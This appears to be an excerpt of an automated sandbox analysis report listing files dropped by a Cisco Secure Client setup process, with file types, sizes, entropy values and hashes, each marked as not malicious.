                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                      MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                      SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                      SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                      SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):467531
                                                                                                                                      Entropy (8bit):5.410391422981112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                      MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                      SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                      SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                      SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312691
                                                                                                                                      Entropy (8bit):6.238069670792444
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                      SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                      SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                      SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312693
                                                                                                                                      Entropy (8bit):6.237794032422467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                      SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                      SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                      SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313019
                                                                                                                                      Entropy (8bit):6.234654802477353
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                      MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                      SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                      SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                      SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313019
                                                                                                                                      Entropy (8bit):6.234654802477353
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                      MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                      SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                      SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                      SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313017
                                                                                                                                      Entropy (8bit):6.23496399047262
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                      MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                      SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                      SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                      SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313017
                                                                                                                                      Entropy (8bit):6.23496399047262
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                      MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                      SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                      SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                      SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3882
                                                                                                                                      Entropy (8bit):6.743390042757195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                      MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                      SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                      SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                      SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3884
                                                                                                                                      Entropy (8bit):6.749338244156901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                      MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                      SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                      SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                      SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3880
                                                                                                                                      Entropy (8bit):6.742220289284142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                      MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                      SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                      SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                      SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3881
                                                                                                                                      Entropy (8bit):6.749191813135782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                      MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                      SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                      SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                      SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):431993
                                                                                                                                      Entropy (8bit):4.565786626694248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                      MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                      SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                      SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                      SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1807
                                                                                                                                      Entropy (8bit):7.846793911413473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                      MD5:536C911881523B9F8402A481881992A0
                                                                                                                                      SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                      SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                      SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.139959170245274
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1916
                                                                                                                                      Entropy (8bit):7.856747119568193
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):421
                                                                                                                                      Entropy (8bit):7.268682924293009
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12558
                                                                                                                                      Entropy (8bit):7.968059020803266
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2860
                                                                                                                                      Entropy (8bit):7.914852791051157
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):51094
                                                                                                                                      Entropy (8bit):7.977081753425093
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.7071518309363354
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83111
                                                                                                                                      Entropy (8bit):7.138058183615623
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76349
                                                                                                                                      Entropy (8bit):6.476357962983417
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83426
                                                                                                                                      Entropy (8bit):7.358868361468608
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16443
                                                                                                                                      Entropy (8bit):7.760065707691873
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                      MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                      SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                      SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                      SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0422788649872297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                      MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                      SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                      SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                      SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75452
                                                                                                                                      Entropy (8bit):6.447447333863436
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                      MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                      SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                      SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                      SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76615
                                                                                                                                      Entropy (8bit):6.470162664157233
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                      MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                      SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                      SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                      SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):399779
                                                                                                                                      Entropy (8bit):7.9639437199622165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                      MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                      SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                      SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                      SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.044905068349432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                      MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                      SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                      SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                      SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0468421318534369
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                      MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                      SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                      SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                      SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):4.905752993252195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                      MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                      SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                      SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                      SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1916
                                                                                                                                      Entropy (8bit):7.856747119568193
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                      MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                      SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                      SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                      SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29327
                                                                                                                                      Entropy (8bit):7.967732566337996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                      MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                      SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                      SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                      SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.020486157649533
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                      MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                      SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                      SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                      SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
